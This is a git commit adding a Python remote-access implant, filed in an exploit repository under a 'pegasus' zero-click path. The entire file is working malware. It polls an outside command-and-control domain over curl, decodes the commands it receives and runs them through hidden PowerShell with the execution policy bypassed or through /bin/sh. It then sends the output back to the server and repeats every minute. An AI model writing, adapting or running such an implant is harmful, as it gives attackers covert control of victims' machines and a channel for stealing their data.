Create fileless_execution.py

ProjectZeroDays · web-flow · commit a8f2afd50a50 · 2026-02-07T06:23:12.000-06:00
diff --git a/src/exploits/zero-click_exploits/pegasus/fileless_execution/fileless_execution.py b/src/exploits/zero-click_exploits/pegasus/fileless_execution/fileless_execution.py
@@ -0,0 +1,114 @@
+# /src/exploits/zero-click_exploits/pegasus/fileless_execution/fileless_execution.py
+
+import os
+import sys
+import subprocess
+import base64
+import json
+import time
+from datetime import datetime
+
+# --- Configuration ---
+# C2 Configuration to fetch the next command or payload
+C2_DOMAIN = "zeroclickexploits.ddns.net"
+C2_PORT = 443
+C2_GET_COMMAND_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/get_command"
+C2_POST_RESULT_ENDPOINT = f"https://{C2_DOMAIN}:{C2_PORT}/api/v1/post_result"
+TARGET_ID = os.environ.get("TARGET_ID", "unknown")
+USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
+
+# --- Logging ---
+def _log_event(message, level='info'):
+    """Internal logger to prevent writing to disk."""
+    timestamp = datetime.now().isoformat()
+    print(f"[{timestamp}] [{level.upper()}] {message}")
+
+# --- C2 Communication ---
+def fetch_command_from_c2():
+    """Fetches a base64-encoded command from the C2 server."""
+    try:
+        payload = {"target_id": TARGET_ID}
+        json_payload = json.dumps(payload)
+        cmd = [
+            "curl", "-k", "-s", "-X", "POST",
+            "-H", "Content-Type: application/json",
+            "-H", f"User-Agent: {USER_AGENT}",
+            "-d", json_payload,
+            C2_GET_COMMAND_ENDPOINT
+        ]
+        result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)
+        if result.returncode == 0:
+            response = json.loads(result.stdout)
+            if response.get("command"):
+                _log_event("Fetched new command from C2.")
+                return base64.b64decode(response["command"]).decode('utf-8')
+        return None
+    except Exception as e:
+        _log_event(f"Failed to fetch command from C2: {e}", 'error')
+        return None
+
+def post_result_to_c2(result, success=True):
+    """Posts the execution result back to the C2 server."""
+    try:
+        payload = {
+            "target_id": TARGET_ID,
+            "success": success,
+            "result": base64.b64encode(result.encode('utf-8')).decode('utf-8'),
+            "timestamp": datetime.utcnow().isoformat() + "Z"
+        }
+        json_payload = json.dumps(payload)
+        cmd = [
+            "curl", "-k", "-s", "-X", "POST",
+            "-H", "Content-Type: application/json",
+            "-H", f"User-Agent: {USER_AGENT}",
+            "-d", json_payload,
+            C2_POST_RESULT_ENDPOINT
+        ]
+        subprocess.run(cmd, capture_output=True, text=True, timeout=30)
+        _log_event("Result posted to C2.")
+    except Exception as e:
+        _log_event(f"Failed to post result to C2: {e}", 'error')
+
+# --- Core Execution Logic ---
+def execute_fileless_command(command):
+    """Executes a command in memory without touching the disk."""
+    try:
+        if sys.platform == 'win32':
+            # Use PowerShell for file-less execution on Windows
+            # -EncodedCommand expects a base64 encoded UTF-16LE string
+            encoded_command = base64.b64encode(command.encode('utf-16le')).decode('utf-8')
+            ps_cmd = ["powershell.exe", "-WindowStyle", "Hidden", "-NoProfile", "-ExecutionPolicy", "Bypass", "-EncodedCommand", encoded_command]
+            result = subprocess.run(ps_cmd, capture_output=True, text=True, timeout=120)
+            output = result.stdout + result.stderr
+            _log_event("PowerShell command executed.")
+            return output, result.returncode == 0
+        else:
+            # On Linux/macOS, we can execute shell commands directly
+            sh_cmd = ["/bin/sh", "-c", command]
+            result = subprocess.run(sh_cmd, capture_output=True, text=True, timeout=120)
+            output = result.stdout + result.stderr
+            _log_event("Shell command executed.")
+            return output, result.returncode == 0
+    except subprocess.TimeoutExpired:
+        error_msg = "Command execution timed out."
+        _log_event(error_msg, 'error')
+        return error_msg, False
+    except Exception as e:
+        error_msg = f"An unexpected error occurred during execution: {e}"
+        _log_event(error_msg, 'error')
+        return error_msg, False
+
+def main():
+    """Main loop to continuously check for and execute commands from C2."""
+    _log_event("File-less Execution Module Activated.")
+    while True:
+        command = fetch_command_from_c2()
+        if command:
+            output, success = execute_fileless_command(command)
+            post_result_to_c2(output, success)
+        else:
+            _log_event("No new commands. Sleeping for 60 seconds.")
+        time.sleep(60)
+
+if __name__ == "__main__":
+    main()
